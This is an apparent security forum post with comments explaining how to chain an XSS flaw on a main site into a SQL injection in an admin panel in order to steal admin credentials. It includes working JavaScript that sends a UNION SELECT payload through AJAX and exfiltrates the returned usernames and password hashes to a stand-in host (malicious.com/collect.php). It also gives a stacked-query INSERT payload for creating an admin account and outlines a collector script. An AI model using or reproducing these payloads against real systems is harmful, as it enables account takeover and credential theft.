• SQL Injection Via XSS

    by
    amolnaik4
    Published on 02-08-2012 07:38 AM      Number of Views: 387  
    4 Comments Comments
    One of the G4H member mandi from Garage4hackers Forums - Home (my second home) asked few days before about xsssqli attack. He had a scenario where the main site is having a cross-site scripting vulnerability and the admin panel has SQL Injection. The page having sql injection in admin panel is only accessible to admin. The question was is it possible to use xss on main site to exploit sql injection on admin panel to get admin account pwned?

    Here is my answer with following scenario:

    There is a main site which is vulnerable to xss flaw (reflected/stored). The same site has a admin panel which is only accessible to admin users and one of the authenticated pages is vulnerable to sql injection. the admin panel can be a separate package like cpanel and the sql injection vulnerability will be already published (exploit-db FTW!!!).

    This is how we can pwn admin account using sql injection via xss.
    1. Attacker crafts a xss payload which is using AJAX to make a request with sql injection payload.
    2. He sends the payload to admin user.
    3. When admin user is logged in into admin panel and clicks the payload link from attacker, the sql injection in admin page is exploited and returns the username & password hashes from admin table.
    4. Attacker then submit the returned data to his site using Ajax and will crack password hashes offline.

    Video Demonstration:


    Any suggestions, comments are welcome.

    AMol NAik
    This article was originally published in blog: SQL Injection Via XSS started by amolnaik4
    Comments 4 Comments
    1. 41.w4r10r's Avatar
      41.w4r10r - 02-08-2012, 12:05 PM


      hey amol how about sharing your ajax script...
      also can we include few more attack vector in this script as we already know that we can use INSERT query and insert an admin user instead of making a long process of cracking hash...
    1. amolnaik4's Avatar
      amolnaik4 - 02-08-2012, 08:53 PM
      hey 41.w4r10r,

      Here is the ajax script used in video:
      Code:
      var url="http://mysite.com/admin/index.php?page=vuln&id=1'+UNION+ALL+SELECT+user,password+from+users-- -"

var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET",url,true);

xmlhttp.onreadystatechange=function(){
	if(xmlhttp.readyState == 4 && xmlhttp.status == 200){
		sendtoattacker(xmlhttp.responseText);
	}
}

xmlhttp.send();

function sendtoattacker(data){
	var myurl = "http://malicious.com/collect.php?log="+data;
	var xhr = new XMLHttpRequest();
	xhr.open("GET",myurl,true);
	xmlhttp.onreadystatechange=function(){
	        if(xmlhttp.readyState == 4 && xmlhttp.status == 200){
			alert("Pass2");
		}
	}
	xhr.send();
}
      Yes, we can include all SQLi attacks using this. Just need to change the ajax script accordingly.

      But with mysql-PHP, we can't use stacked SQL queries, so it;s not possible to use INSERT/UPDATE in this case:
      Code:
      http://mysite.com/admin/index.php?page=vuln&id=1';INSERT INTO users values('10','newadmin','newpass');-- -
      It can be possible on other platforms.

      AMol NAik
    1. Angel--D3m0n's Avatar
      Angel--D3m0n - 03-02-2012, 12:39 PM
      please share all attachments (collect.php and user_pass.html) im w8ing..... TNX
    1. amolnaik4's Avatar
      amolnaik4 - 03-02-2012, 01:08 PM
      Angel--D3m0n,

      'collect.php' is a simple file which gets input and write it into 'user-pass.html' file. I'll suggest you create one for yourself so that you will learn PHP as well.

      Here are few steps 'collect.php' should do:
      1. Collect input via GET parameter.
      2. Open a file for writing.
      3. Write collected content into the previously opened file.
      4. Close the file.

      Do some googling for syntax and examples. php.net is a gr8 source too.

      AMol NAik

  • G4H Twitter

  • Latest Posts

    amolnaik4

    Research Resources for MS SharePoint

    This page contains research notes on Microsoft’s SharePoint MOSS and WSS.

    Link:
    https://www.owasp.org/index.php/Research_for_SharePoint_%28MOSS%29

    amolnaik4 Today, 12:25 PM Go to last post
    b0nd

    Lolz, with the title "About Admin" I thought...

    Lolz, with the title "About Admin" I thought Admins of garage have been exposed ;)

    @hazard74, there is always a proper "way" to ask - you need to discover that. It's not that Pentesters don't have...

    b0nd Today, 09:10 AM Go to last post
    hazard74

    Ok, Anant Shrivastava. Im Sorry :)

    Ok, Anant Shrivastava.

    Im Sorry :)

    hazard74 Yesterday, 06:19 PM Go to last post
    Anant Shrivastava

    not exactly this format but a simmilar kind of a...

    not exactly this format but a simmilar kind of a format i have seen as part of malware. This url format was used to get the commands from the remote server. there was a whole bunch of domain names in...

    Anant Shrivastava Yesterday, 05:30 PM Go to last post
    Immaturedevil

    Hi Neo, Thanks for your comment. I have...

    Hi Neo,

    Thanks for your comment. I have already done that... but no success..as these URLs are not recognized by search engines as such. getting some info if anyone has come across with URLs in...

    Immaturedevil Yesterday, 05:21 PM Go to last post